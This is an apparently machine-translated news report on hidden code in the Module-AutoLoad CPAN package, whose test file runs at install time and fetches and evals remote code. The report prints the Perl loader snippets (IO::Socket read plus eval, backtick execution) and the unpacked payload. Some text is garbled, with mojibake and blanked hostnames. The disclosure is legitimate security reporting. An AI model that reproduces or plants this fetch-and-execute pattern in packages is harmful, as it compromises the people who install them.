Malicious code found in Module-AutoLoad Perl package

In the Perl package distributed through the CPAN catalog Module-AutoLoad, designed for automatic loading of CPAN modules on the fly, identified malicious code. The malicious insert was found in test code 05_rcx.t, which has been supplied since 2011.
It is noteworthy that questions about downloading dubious code arose on Stackoverflow back in 2016.

Malicious activity comes down to an attempt to download and execute code from a third-party server ( while executing a test suite that is launched when the module is installed. It is assumed that the code initially downloaded from an external server was not malicious, but now the request is redirected to the domain, which gives its portion of the code for execution.

To organize the download in a file 05_rcx.t the following code is used:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/}x;
my $try = `$^X $prog`;

The specified code leads to the execution of the script ../contrib/, whose content is reduced to the string:

use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET":1β€³};

This script loads confused using the service code from the external host (character codes correspond to the text "R.cX") and executes it in the eval block.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET":1"; print<$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

After unpacking, the following is executed as a result code:

print{$b=new IO::Socket::INET"β€³}"GET /iJailBreak
";evalor return warn$@while$b;1

The problematic package has now been removed from the repository BREAK (Perl Authors Upload Server) and the module author account is disabled. However, the module remains available in the MetaCPAN archive and can be directly installed from MetaCPAN using some utilities such as cpanminus. It is notedthat the package was not widely distributed.

Interestingly, up for discussion connected and the author of the module, who refuted the information that the malicious code was substituted after his site "" was hacked and explained that he was just having fun, and he used not to hide something, but to reduce the size of the code and simplification of its copying through the clipboard. The choice of the function name "botstrap" is explained by the fact that this word "sounds like a bot and is shorter than bootstrap". The author of the module also assured that the identified manipulations do not perform malicious actions, but only demonstrate the loading and execution of code over TCP.


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